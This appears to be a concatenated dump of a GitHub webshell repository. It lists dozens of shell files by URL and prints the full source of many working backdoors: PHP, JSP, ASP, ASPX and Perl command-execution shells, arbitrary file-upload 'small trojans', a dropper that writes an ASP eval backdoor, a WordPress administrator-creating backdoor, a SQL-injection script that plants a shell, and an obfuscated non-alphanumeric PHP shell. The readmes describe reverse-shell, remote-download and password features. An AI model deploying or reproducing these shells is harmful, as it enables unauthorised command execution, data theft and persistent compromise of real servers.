/ewebedtior编辑器本地构造上传漏洞利用代码.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/ewebedtior编辑器本地构造上传漏洞利用代码.html -------------------------------------------------------------------------------- /Other/acat/ACat-附数据库驱动-jdk1.5.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/acat/ACat-附数据库驱动-jdk1.5.jar -------------------------------------------------------------------------------- /Php/PHP-Shell-Detector-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/PHP-Shell-Detector-master.zip -------------------------------------------------------------------------------- /Php/Spider PHP Shell (SPS-3.0).php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Spider PHP Shell (SPS-3.0).php -------------------------------------------------------------------------------- /Asp/80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一.asp -------------------------------------------------------------------------------- /Other/cat.aar/axis2 利用小工具cat.aar.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/cat.aar/axis2 利用小工具cat.aar.zip -------------------------------------------------------------------------------- /Php/KAdot Universal Shell v0.1.6.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/KAdot Universal Shell v0.1.6.php -------------------------------------------------------------------------------- /Php/KAdot_Universal_Shell_v0.1.6.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/KAdot_Universal_Shell_v0.1.6.php -------------------------------------------------------------------------------- /Php/Silic Group php Webshell v3.php: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Silic Group php Webshell v3.php -------------------------------------------------------------------------------- /Other/File include Bypass/litteryi.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Other/File include Bypass/litteryi.txt -------------------------------------------------------------------------------- /Php/GFS web-shell ver 3.1.7 - PRiV8.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/GFS web-shell ver 3.1.7 - PRiV8.php -------------------------------------------------------------------------------- /Php/GFS_web-shell_ver_3.1.7_-_PRiV8.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/GFS_web-shell_ver_3.1.7_-_PRiV8.php -------------------------------------------------------------------------------- /Aspx/WebSniff 1.0 Powered by C.C.T.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Aspx/WebSniff 1.0 Powered by C.C.T.aspx -------------------------------------------------------------------------------- /Php/Antichat Shell. Modified by Go0o$E.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Antichat Shell. 
Modified by Go0o$E.php -------------------------------------------------------------------------------- /Php/Ayyildiz Tim -AYT- Shell v 2.1 Biz.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Ayyildiz Tim -AYT- Shell v 2.1 Biz.php -------------------------------------------------------------------------------- /Php/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt -------------------------------------------------------------------------------- /Php/Adminer - Compact database management.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Adminer - Compact database management.php -------------------------------------------------------------------------------- /Php/Silic Group Hacker Army - BlackBap.Org.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Silic Group Hacker Army - BlackBap.Org.php -------------------------------------------------------------------------------- /Asp/RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Asp/RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer.asp -------------------------------------------------------------------------------- /Php/AK-74 Security Team Web Shell Beta Version.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/AK-74 Security Team Web Shell Beta Version.php -------------------------------------------------------------------------------- 
/Php/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php -------------------------------------------------------------------------------- /Jsp/Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Jsp/Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp -------------------------------------------------------------------------------- /Aspx/MYSQL Manager -Asp.net Silic Group Hacker Army专用版本.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Aspx/MYSQL Manager -Asp.net Silic Group Hacker Army专用版本.aspx -------------------------------------------------------------------------------- /File include Bypass/includer.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Other/File include Bypass/includer.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tutorial0/WebShell/HEAD/Php/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php -------------------------------------------------------------------------------- /Other/jdk1.3webshell/readme.MD: -------------------------------------------------------------------------------- 1 | jdk 1.3 tomcat 7测试通过 2 | 3 | jdk 1.3 weblogic 8测试通过 4 | 5 | 只完成基本的文件操作功能(文件浏览,上传、下载、删除、编辑)和命令执行 6 | 7 | 
[site](http://www.shack2.org/article/1415181383.html) -------------------------------------------------------------------------------- /Php/blackbin/v1/readme.md: -------------------------------------------------------------------------------- 1 | look here: 2 | 3 | http://blog.wangzhan.360.cn/?p=65 4 | 5 | 6 | demo : 7 | 8 | first you open webshell is "404", then enter "p", after show login page 9 | 10 | pass: demo123456 -------------------------------------------------------------------------------- /Other/cat.aar/Readme.md: -------------------------------------------------------------------------------- 1 | #axis2 利用小工具cat.aar 2 | 3 | Author:园长 4 | 文章url:http://p2j.cn/?p=1548 5 | [下载文章的pdf](https://raw.githubusercontent.com/tennc/webshell/master/other/cat.aar/axis2%20%E5%88%A9%E7%94%A8%E5%B0%8F%E5%B7%A5%E5%85%B7cat.pdf) 6 | -------------------------------------------------------------------------------- /Php/ZyklonShell.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 Not Found 4 | 5 |

Not Found

6 | The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.

7 | 8 | -------------------------------------------------------------------------------- /构造的上传.html: -------------------------------------------------------------------------------- 1 |

Upload a new file:
3 |
4 | 5 |
-------------------------------------------------------------------------------- /FCKeditor编辑器本地构造的上传.html: -------------------------------------------------------------------------------- 1 |
Upload a new file:
3 |
4 | 5 |
-------------------------------------------------------------------------------- /Jsp/新型JSP小马支持上传任意格式文件.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream is=request.getInputStream();byte[] b=new byte[512];int n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%> -------------------------------------------------------------------------------- /Php/Uploader.php: -------------------------------------------------------------------------------- 1 |
2 | 3 | Send this file: 4 | 5 |
6 | 9 | 10 | -------------------------------------------------------------------------------- /Aspx/上传马.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="VB" %> 2 | <%@ import Namespace="System.IO" %> 3 | 10 | -------------------------------------------------------------------------------- /Php/blackbin/v1/make2.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/simple-backdoor.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | "; 7 | $cmd = ($_REQUEST['cmd']); 8 | system($cmd); 9 | echo ""; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 16 | 17 | 18 | -------------------------------------------------------------------------------- /Jsp/带回显执行cmd.jsp: -------------------------------------------------------------------------------- 1 | <% if("023".equals(request.getParameter("pwd"))){ 2 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); 3 | int a = -1; 4 | byte[] b = new byte[2048]; 5 | out.print("
");  
 // Relays the spawned process's stdout into the HTTP response, one read() per pass.
 // `in` is the stream returned by Runtime.exec(...) earlier in this scriptlet, so the
 // command runs as a child of the servlet container's JVM; process-creation telemetry
 // with the app server as parent is where this activity surfaces.
 // NOTE(review): new String(b) converts the whole 2048-byte buffer, not just the `a`
 // bytes read on this pass, and uses the platform default charset, so the response can
 // carry padding or bytes left over from an earlier read.
 6 |         while((a=in.read(b))!=-1){  
 7 |             out.println(new String(b));  
 8 |         }  
 9 |         out.print("
"); 10 | } %> 11 | -------------------------------------------------------------------------------- /Php/simple_cmd.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | G-Security Webshell 4 | 5 | 6 | 7 |
8 |
9 | 11 |
12 |
13 | 
14 | 
15 | 
16 |
17 | 18 | 3 | 4 | "; 8 | $cmd = ($_REQUEST['cmd']); 9 | system($cmd); 10 | echo ""; 11 | die; 12 | } 13 | 14 | ?> 15 | 16 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /Php/Non-alphanumeric.php: -------------------------------------------------------------------------------- 1 | >$_;$_[]=$__;$_[]=@_;@$_[((++$__)+($__++ ))].=$_; 4 | $_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__]; 5 | $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] ); 6 | $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] ); 7 | $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ]; 8 | $_=$ 9 | $_[$__+ $__] ;$_[@-_]($_[@!+_] ); 10 | 11 | ?> -------------------------------------------------------------------------------- /asp.ashx: -------------------------------------------------------------------------------- 1 | <%@ WebHandler Language="C#" class="Handler" %> 2 | 3 | using System; 4 | using System.Web; 5 | using System.IO; 6 | public class Handler : IHttpHandler { 7 | 8 | public void ProcessRequest (HttpContext context) { 9 | context.Response.ContentType = "text/plain"; 10 | 11 | StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp")); 12 | file1.Write("<%response.clear:execute request(\"root\"):response.End%>"); 13 | file1.Flush(); 14 | file1.Close(); 15 | 16 | } 17 | 18 | public bool IsReusable { 19 | get { 20 | return false; 21 | } 22 | } 23 | 24 | } 25 | -------------------------------------------------------------------------------- /Other/acat/readme.md: -------------------------------------------------------------------------------- 1 | Author:园长MM 2 | 3 | 4 | 下载: 5 | ACat-jdk1.5.jar、ACat-附数据库驱动-jdk1.5.jar、 ACat-jdk.1.7.jar、ACat-附数据库驱动.jar 6 | 7 | 源码: 8 | ACat-src.zip 9 | 10 | 描述: 11 | 12 | 
这是一个用java实现的非常小(18kb)的webServer。之前在drops发了一个简单的demo:http://drops.wooyun.org/papers/869。这个也非常简单,只实现了几个servlet的api,不过已实现了后门相关的其他功能。启动成功后会开启9527端口,然后访问:http://xxx.com:9527/api.jsp,密码:023。 13 | 14 | 停止服务:http://xxx.com:9527/api.jsp?action=stop 15 | 16 | 密码和端口配置在jar里面的server.properties: 17 | 18 | 19 | 20 | 运行方式:java -jar ACat.jar或者在jsp里面调用。 21 | 22 | 23 | 24 | 如果需要连接数据库需要下载:ACat-附数据库驱动.jar,或者自行添加相关jar。 -------------------------------------------------------------------------------- /Aspx/ASPX one line Code Client by amxku.aspx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ASPX one line Code Client by amxku 5 | 6 | 7 |
8 | 13 |

14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /Php/ru24_post_sh.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | Ru24PostWebShell - ".$_POST['cmd']." 13 | 14 | "; 15 | echo ""; 16 | echo ""; 17 | echo ""; 18 | echo "
";
// When the POSTed cmd field is missing or empty, a fixed default command string is
// substituted before the value is passed to $function on the next line.
// The literal default string is a stable content indicator when scanning a web root
// for this file.
// NOTE(review): the assignment of $function is not visible in this listing (the
// opening lines of the file were lost in extraction), so the execution primitive it
// names cannot be confirmed here.
19 | if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
20 | echo "".$function($_POST['cmd'])."
"; 21 | 22 | 23 | ?> 24 | -------------------------------------------------------------------------------- /Php/wordpress backdoor.txt: -------------------------------------------------------------------------------- 1 | set_role( 'administrator' ); 10 | } else { 11 | die("User already exists..."); 12 | } 13 | } 14 | } -------------------------------------------------------------------------------- /cmd.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.io.*" %> 2 | <% 3 | try { 4 | String cmd = request.getParameter("cmd"); 5 | Process child = Runtime.getRuntime().exec(cmd); 6 | InputStream in = child.getInputStream(); 7 | int c; 8 | while ((c = in.read()) != -1) { 9 | out.print((char)c); 10 | } 11 | in.close(); 12 | try { 13 | child.waitFor(); 14 | } catch (InterruptedException e) { 15 | e.printStackTrace(); 16 | } 17 | } catch (IOException e) { 18 | System.err.println(e); 19 | } 20 | %> 21 | -------------------------------------------------------------------------------- /Jsp/上传小马.jsp: -------------------------------------------------------------------------------- 1 | <%@ page language="java" pageEncoding="gbk"%><% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>0<%}}if(i==0){%>1<%}%>
" name="url">
38 | 39 |
- BY F4ck
40 |
41 | <% end if %> 42 | 43 | shell.asp?miemie=av -------------------------------------------------------------------------------- /Php/pHpINJ.php: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | || .::News Remote PHP Shell Injection::. || 6 | 7 | 8 |
|| .::News PHP Shell Injection::. ||


9 | ' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile"; 15 | $sql = urlencode($sql); 16 | $expurl= $url."?id=".$sql ; 17 | echo ' Click Here to Exploit
'; 18 | echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results"; 19 | } 20 | else 21 | { 22 | ?> 23 | Url to index.php:
24 |
" method = "post"> 25 |
26 | Server Path to Shell:
27 | Full server path to a writable file which will contain the Php Shell
28 |

29 |

30 | 31 | 32 | 33 | 36 | 37 | -------------------------------------------------------------------------------- /Other/Axis2Shell/README.md: -------------------------------------------------------------------------------- 1 | axis2 2 | ========= 3 | 4 | axis2 web shell 5 | author : Svti 6 | url : https://github.com/Svti/Axis2Shell 7 | 8 | 使用介绍: 9 | 10 | 1、命令执行 11 | http://1.1.1.1/services/config/exec?cmd=whoami 12 | (不说了,执行命令。注意:xml换行没有处理好) 13 | 14 | 2、反弹shell 15 | http://1.1.1.1/services/config/shell?host=1.1.1.1&port=5555 16 | (Linux则使用bash反弹shell,Windows则会进行socket执行shell) 17 | 18 | 3、文件上传 19 | http://1.1.1.1/services/config/upload?path=/opt/tomcat/webapps/ROOT/shell.jsp 20 | (会把resource目录下面的one.txt 写成shell.jsp,注意:全路径,带*文件名) 21 | 22 | 4、文件下载 23 | http://1.1.1.1/services/config/download?url=http://www.ooo.com/mm.txt&path=/opt/tomcat/webapps/ROOT/shell.jsp 24 | (会把这个URL的文件写成shell.jsp,注意:全路径,带*文件名) 25 | 26 | 27 | 5、class目录查看 28 | http://1.1.1.1/services/config/getClassPath 29 | (会显示当前class的路径,方便文件上传) 30 | 31 | ps: 32 | 趁周末休息,看了几个国外的机器有 axis的 项目,特地去找了@园长的Cat.aar工具,发现真心不好使。 33 | 34 | 1、反弹shell 鸡肋,好多错误 ,ls / 都不行。 35 | 36 | 2、没有文件上传功能。这个对于一个渗透着来说很重要 37 | 38 | 于是自己写了个,希望大家喜欢。 39 | 40 | 源码已经上github https://github.com/Svti/Axis2Shell 41 | 42 | aar 文件 https://github.com/Svti/Axis2Shell/blob/master/config.aar 也在github上面,还有什么问题,可以在下面评论 43 | 44 | 45 | 注意: 46 | 47 | 1、相同文件名的aar文件只能上传一次,虽说是remove Service了,服务器上面的还在。想要继续使用,请rename 48 | 49 | 2、默认的jsp一句话木马是/resource/one.txt,可以自己修改。默认密码是wooyun,发布版本里面放的是one.jsp,一向鄙视伸手党 50 | 3、Linux反弹shell 会在当前目录生成一个wooyun.sh的文件,当shell断开后会自动删除 51 | 52 | -------------------------------------------------------------------------------- /Asp/CmdAsp.asp: -------------------------------------------------------------------------------- 1 | <++ CmdAsp.asp ++> 2 | <%@ Language=VBScript %> 3 | <% 4 | ' --------------------o0o-------------------- 5 | ' File: CmdAsp.asp 6 | ' Author: Maceo 7 | ' Release: 2000-12-01 8 | ' OS: Windows 2000, 4.0 NT 9 | ' 
------------------------------------------- 10 | 11 | Dim oScript 12 | Dim oScriptNet 13 | Dim oFileSys, oFile 14 | Dim szCMD, szTempFile 15 | 16 | On Error Resume Next 17 | 18 | ' -- create the COM objects that we will be using -- ' 19 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 20 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 21 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 22 | 23 | ' -- check for a command that we have posted -- ' 24 | szCMD = Request.Form(".CMD") 25 | If (szCMD <> "") Then 26 | 27 | ' -- Use a poor man's pipe ... a temp file -- ' 28 | szTempFile = "C:\" & oFileSys.GetTempName( ) 29 | Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 30 | Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 31 | 32 | End If 33 | 34 | %> 35 | 36 | 37 | " method="POST"> 38 | 39 | 40 | 41 |
42 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
43 | 
44 | <% 45 | If (IsObject(oFile)) Then 46 | ' -- Read the output from our command and remove the temp file -- ' 47 | On Error Resume Next 48 | Response.Write Server.HTMLEncode(oFile.ReadAll) 49 | oFile.Close 50 | Call oFileSys.DeleteFile(szTempFile, True) 51 | End If 52 | %> 53 | 54 | 55 | <-- CmdAsp.asp --> 56 | -------------------------------------------------------------------------------- /Jsp/小马.jsp: -------------------------------------------------------------------------------- 1 | <%@page contentType="text/html;charset=gb2312"%> 2 | <%@page import="java.io.*,java.util.*,java.net.*"%> 3 | 4 | 5 | 6 | 9 | 10 | 11 | <% 12 | if(request.getParameter("context")!=null) 13 | { 14 | String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"gb2312"); 15 | String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"gb2312"); 16 | OutputStream pt = null; 17 | try { 18 | pt = new FileOutputStream(path); 19 | pt.write(context.getBytes()); 20 | out.println("上传成功!"); 21 | } catch (FileNotFoundException ex2) { 22 | out.println("上传失败!"); 23 | } catch (IOException ex) { 24 | out.println("上传失败!"); 25 | } finally { 26 | try { 27 | pt.close(); 28 | } catch (IOException ex3) { 29 | out.println("上传失败!"); 30 | } 31 | } 32 | } 33 | %> 34 |
35 | 本文件的路径:<%out.print(request.getRealPath(request.getServletPath())); %> 36 |
37 |
38 | 上传文件路径:"> 39 |
40 |
41 | 上传文件内容: 42 |
43 |
44 | 45 |
46 | 47 | 48 | -------------------------------------------------------------------------------- /Jsp/hahahaha小马.JSp: -------------------------------------------------------------------------------- 1 | <%@page contentType="text/html; charset=GBK" import="java.io.*;"%> 2 | <%!private String password="admin";//?·??????????BC??????%> 3 | 4 | 5 | hahahaha 6 | 7 | 8 | <% 9 | String act=""; 10 | String path=request.getParameter("path"); 11 | String content=request.getParameter("content"); 12 | String url=request.getRequestURI(); 13 | String url2=request.getRealPath(request.getServletPath()); 14 | try 15 | {act=request.getParameter("act").toString();} 16 | catch(Exception e){} 17 | if(request.getSession().getAttribute("hehe")!=null) 18 | { 19 | if(request.getSession().getAttribute("hehe").toString().equals("hehe")) 20 | { 21 | if (path!=null && !path.equals("") && content!=null && !content.equals("")) 22 | { 23 | try{ 24 | File newfile=new File(path); 25 | PrintWriter writer=new PrintWriter(newfile); 26 | writer.println(content); 27 | writer.close(); 28 | if (newfile.exists() && newfile.length()>0) 29 | { 30 | out.println("save ok!"); 31 | }else{ 32 | out.println("save erry!"); 33 | } 34 | }catch(Exception e) 35 | { 36 | e.printStackTrace(); 37 | } 38 | } 39 | out.println("
"); 40 | out.println("

"); 41 | out.println(""+url2+"
"); 42 | out.println("
"); 43 | out.println(""); 44 | out.println("
"); 45 | } 46 | }else{ 47 | out.println("
"); 48 | out.println(""); 49 | out.println(""); 50 | out.println("
"); 51 | }if(act.equals("login")) 52 | { 53 | String pass=request.getParameter("pass"); 54 | if(pass.equals(password)) 55 | { 56 | session.setAttribute("hehe","hehe"); 57 | String uri=request.getRequestURI(); 58 | uri=uri.substring(uri.lastIndexOf("/")+1); 59 | response.sendRedirect(uri); 60 | }else 61 | { 62 | out.println("Error"); 63 | out.println("go back
"); 64 | } 65 | } 66 | %> 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /Pl/GO.cgi.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | #change this password; for power security - delete this file =) 4 | $pwd='adm'; 5 | 6 | print "Content-type: text/html\n\n"; 7 | &read_param(); 8 | if (!defined$param{dir}){$param{dir}="/"}; 9 | if (!defined$param{cmd}){$param{cmd}="ls -la"}; 10 | if (!defined$param{pwd}){$param{pwd}='ter'}; 11 | 12 | print << "[kalabanga]"; 13 | 14 | GO.cgi 15 | 38 | 39 | 40 | Current request is: 41 |
42 | [kalabanga] 43 | 44 | print "cd $param{dir}&&$param{cmd}"; 45 | 46 | print << "[kalabanga]"; 47 |
48 | Answer for current request is: 49 |
50 | [kalabanga]
51 | 
# Gate: the pwd request parameter is compared with the hard-coded $pwd; on a mismatch
# only the error text is printed and nothing is executed.
# On a match, $param{dir} and $param{cmd} are interpolated into a piped open() and the
# command's output is printed into the response.
# read_param (end of this script) fills %param from QUERY_STRING, so the password,
# directory and command all travel in the request URL and are recorded in ordinary web
# server access logs.
# NOTE(review): the read operand after `$line=` appears to have been lost in page
# extraction; as printed, the loop does not read from FILEHANDLE.
52 | if ($param{pwd} ne $pwd){print "user invalid, please replace user";}
53 | else {
54 | open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
55 | while ($line=){print "$line";};
56 | close (FILEHANDLE);
57 | };
58 | 
59 | print << "[kalabanga]";
60 | 
61 |
62 | Password: 63 | 64 | Dir for next request: 65 | 66 | next request: 67 | 68 | 69 | 70 |
71 | 72 | 73 | [kalabanga] 74 | 75 | sub read_param { 76 | $buffer = "$ENV{'QUERY_STRING'}"; 77 | @pairs = split(/&/, $buffer); 78 | foreach $pair (@pairs) 79 | { 80 | ($name, $value) = split(/=/, $pair); 81 | $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; 82 | $value =~ s/\+/ /g; 83 | $value =~ s/%20/ /g; 84 | $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; 85 | $param{$name} = $value; 86 | } 87 | } -------------------------------------------------------------------------------- /Php/Worse Linux Shell.php: -------------------------------------------------------------------------------- 1 | body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}"; 6 | print "

#worst @dal.net

"; 7 | print "

You have been hack By Shany with Love To #worst.

"; 8 | print "

Watch Your system Shany was here.

"; 9 | print "

Linux Shells

"; 10 | print "

"; 11 | 12 | $currentWD = str_replace("\\\\","\\",$_POST['_cwd']); 13 | $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']); 14 | 15 | $UName = `uname -a`; 16 | $SCWD = `pwd`; 17 | $UserID = `id`; 18 | 19 | if( $currentWD == "" ) { 20 | $currentWD = $SCWD; 21 | } 22 | 23 | print ""; 24 | print ""; 25 | print ""; 26 | print ""; 27 | print ""; 28 | print "
We are:".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")
Server is:".$_SERVER['SERVER_SIGNATURE']."
System type:$UName
Our permissions:$UserID
"; 29 | 30 | print "

"; 31 | 32 | if( $_POST['_act'] == "List files!" ) { 33 | $currentCMD = "ls -la"; 34 | } 35 | 36 | print "
"; 37 | 38 | print ""; 39 | print ""; 40 | 41 | print ""; 42 | print ""; 43 | 44 | print ""; 45 | print ""; 46 | 47 | print "
Execute command:
Change directory:
Upload file:


"; 48 | 49 | $currentCMD = str_replace("\\\"","\"",$currentCMD); 50 | $currentCMD = str_replace("\\\'","\'",$currentCMD); 51 | 52 | if( $_POST['_act'] == "Upload!" ) { 53 | if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) { 54 | print "
Error while uploading file!
"; 55 | } else { 56 | print "
";
57 |         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
58 |         print "
File uploaded successfully!
"; 59 | } 60 | } else { 61 | print "\n\n\n
\n";
62 |     $currentCMD = "cd ".$currentWD.";".$currentCMD;
63 |     system($currentCMD);
64 |     print "\n
\n\n\n


Command completed
"; 65 | } 66 | 67 | exit; 68 | 69 | ?> 70 | -------------------------------------------------------------------------------- /Php/h4ntu shell [powered by tsoi].php: -------------------------------------------------------------------------------- 1 | h4ntu shell [powered by tsoi] 2 | This Is The Server Information

"; 4 | ?> 5 | 6 | 16 | 17 |
18 | 19 | 23 | 24 | 25 | 26 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 |
:
User Info: uid=() euid=() gid=()
Current Path:
Permission Directory:
Server Services:
Server Adress:
Script Current User:
PHP Version:
55 |
56 | 57 | #php injection:
58 |
"> 59 | cmd : 60 | 61 |
62 | 63 |
64 | 65 |
66 | 67 |
68 |  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
73 |   $output = ob_get_contents();
74 |   ob_end_clean();
75 |   if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
76 | exit;
77 | ?>
78 | 
79 | -------------------------------------------------------------------------------- /Php/h4ntu_shell_[powered_by_tsoi].php: -------------------------------------------------------------------------------- 1 | h4ntu shell [powered by tsoi] 2 | This Is The Server Information

"; 4 | ?> 5 | 6 | 16 | 17 |
18 | 19 | 23 | 24 | 25 | 26 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 |
:
User Info: uid=() euid=() gid=()
Current Path:
Permission Directory:
Server Services:
Server Adress:
Script Current User:
PHP Version:
55 |
56 | 57 | #php injection:
58 |
"> 59 | cmd : 60 | 61 |
62 | 63 |
64 | 65 |
66 | 67 |
68 |  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
73 |   $output = ob_get_contents();
74 |   ob_end_clean();
75 |   if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
76 | exit;
77 | ?>
78 | 
79 | -------------------------------------------------------------------------------- /Php/NCC-Shell.php: -------------------------------------------------------------------------------- 1 |
2 |

.:NCC:. Shell v1.0.0

3 | .:NCC:. Shell v1.0.0 4 |

Hacked by Silver

5 |

---------------------------------------------------------------------------------------


6 | ---Server Info---
7 | Safe Mode on/off: "; 9 | // Check for safe mode 10 | if( ini_get('safe_mode') ) { 11 | print 'Safe Mode ON'; 12 | } else { 13 | print 'Safe Mode OFF'; 14 | } 15 | echo "
"; 16 | echo "Momentane Directory: "; echo $_SERVER['DOCUMENT_ROOT']; 17 | echo "
"; 18 | echo "Server:
"; echo $_SERVER['SERVER_SIGNATURE']; 19 | echo "PHPinfo"; 20 | if(@$_GET['p']=="info"){ 21 | @phpinfo(); 22 | exit;} 23 | ?> 24 |

---------------------------------------------------------------------------


25 |

- Upload -

26 | Upload - Shell/Datei 27 |
31 | 32 | 33 |
34 |
35 | \n", 41 | $_FILES['probe']['name']); 42 | printf("Sie ist %u Bytes groß und vom Typ %s.
\n", 43 | $_FILES['probe']['size'], $_FILES['probe']['type']); 44 | } 45 | ?> 46 |

---------------------------------------------------------------------------


47 |

IpLogger

48 |
IP:
"; echo $_SERVER['REMOTE_ADDR']; 50 | echo "
PORT:
"; echo $_SERVER['REMOTE_PORT']; 51 | echo "
BROWSER:
"; echo $_SERVER[HTTP_REFERER]; 52 | echo "
REFERER:
"; echo $_SERVER['HTTP_USER_AGENT']; 53 | ?> 54 |

---------------------------------------------------------------------------


55 |

Directory Lister

56 |

>

57 |

---------------------------------------------------------------------------


58 | --Coded by Silver©--
59 | ~|_Team .:National Cracker Crew:._|~
60 | -->NCC<--
61 | -------------------------------------------------------------------------------- /Php/lamashell.php: -------------------------------------------------------------------------------- 1 | 18 | 20 | 21 | 22 | lama's'hell v. 3.0 23 | 30 | 31 | 32 |
33 |                               _           _
